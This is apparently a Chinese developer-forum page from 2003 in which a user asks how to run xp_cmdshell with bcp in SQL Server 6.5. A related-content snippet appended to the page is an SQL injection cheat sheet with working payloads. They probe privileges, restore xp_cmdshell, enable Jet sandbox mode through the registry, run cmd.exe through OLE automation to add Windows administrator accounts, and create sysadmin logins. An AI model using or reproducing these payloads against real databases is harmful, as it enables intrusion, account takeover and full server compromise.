EXEC master..xp_cmdshell ..怎么执行呀？

flyboat 2003-12-09 02:43:28

EXEC master..xp_cmdshell 'bcp "SSINSTAL" out D:\DT.txt -c -q -USUN -P'
怎么执行？
见笑了

...全文

297 6 打赏收藏转发到动态举报

写回复

用AI写文章

6 条回复

切换为时间正序

请发表友善的回复…

发表回复

flyboat 2003-12-09

打赏
举报

多谢，一会试试

klan 2003-12-09

打赏
举报

要命。。。

C:\MSSQL65\Binn\isqlw.exe

Coolyu0916 2003-12-09

打赏
举报

6.5好像没有master..xp_cmdshell这个存储过程
：（

flyboat 2003-12-09

打赏
举报

查询分析器在哪里？

flyboat 2003-12-09

打赏
举报

补充：是在sql server6。5中

klan 2003-12-09

打赏
举报

放在查询分析器中执行

MS SQL入侵(小心 xp_cmdshell)

SQL语句导入导出大全 /** 导入文本文件 EXEC master..xp_cmdshell bcp dbname..tablename in c:\DT.txt -c -Sservername -Usa -Ppassword /** 导出文本文件 EXEC master..xp_cmdshell bcp dbname..tablename out c:\DT.txt -c -Sservername -Usa -Ppassword 或 EXEC master..xp_cmdshell bcp "Select * from dbname..tablename" queryout c:\DT.txt -c -Sservername -Usa -Ppassword

代码如下:xp_cmdshell可以让系统管理员以操作系统命令行解释器的方式执行给定的命令字符串，并以文本行方式返回任何输出，是一个功能非常强大的扩展存贮过程。一般情况下，xp_cmdshell对管理员来说也是不必要的，xp_cmdshell的消除不会对Server造成任何影响。可以将xp_cmdshell消除： Use Master Exec sp_dropextendedproc N’xp_cmdshell’ Go 如果需要的话，可以把xp_cmdshell恢复回来： Use Master Exec sp_addextendedproc N’xp_cmdshel

批量执行文件里的sql文件的解决方案，来源网络。

常用的一些命令：我记性不好，所以把常用的注入代码记录下来，有点乱，但对我来说，还算很有用，希望大家也会喜欢！ //看看是什么权限的 and 1=(Select IS_MEMBER('db_owner')) And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;-- //检测是否有读取某数据库的权限 and 1= (Select HAS_DBACCESS('master')) And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 -- 数字类型 and char(124)%2Buser%2Bchar(124)=0 字符类型 ' and char(124)%2Buser%2Bchar(124)=0 and ''=' 搜索类型 ' and char(124)%2Buser%2Bchar(124)=0 and '%'=' 爆用户名 and user>0 ' and user>0 and ''=' 检测是否为SA权限 and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 -- 检测是不是MSSQL数据库 and exists (select * from sysobjects);-- 检测是否支持多行 ;declare @d int;-- 恢复 xp_cmdshell ;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';-- select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') //----------------------- // 执行命令 //----------------------- 首先开启沙盘模式： exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 然后利用jet.oledb执行系统命令 select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")') 执行命令 ;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';-- EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111' 判断xp_cmdshell扩展存储过程是否存在： http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') 写注册表 exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 REG_SZ 读注册表 exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit' 读取目录内容 exec master..xp_dirtree 'c:\winnt\system32\',1,1 数据库备份 backup database pubs to disk = 'c:\123.bak' //爆出长度 And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;-- 更改sa口令方法：用sql综合利用工具连接后，执行命令： exec sp_password NULL,'新密码','sa' 添加和删除一个SA权限的用户test： exec master.dbo.sp_addlogin test,ptlove exec master.dbo.sp_addsrvrolemember test,sysadmin

MS-SQL Server

34,838

社区成员

254,632

社区内容

发帖

与我相关

我的任务

社区管理员

加入社区

近7日
近30日
至今

加载中

查看更多榜单

社区公告

暂无公告

试试用AI创作助手写篇文章吧

+ 用AI写文章